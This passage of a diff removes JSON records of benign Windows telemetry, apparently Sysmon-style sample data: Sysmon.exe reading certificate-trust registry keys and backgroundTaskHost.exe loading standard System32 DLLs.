"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "backgroundTaskHost.exe", - "image_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571688860000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "twinapi.appcore.dll", - "image_path": "C:\\Windows\\System32\\twinapi.appcore.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "rmclient.dll", - "image_path": "C:\\Windows\\System32\\rmclient.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571689180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689180000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "WinTypes.dll", - "image_path": "C:\\Windows\\System32\\WinTypes.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689180000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571689650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "MrmCoreR.dll", - "image_path": "C:\\Windows\\System32\\MrmCoreR.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689650000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571690270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571690270000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", 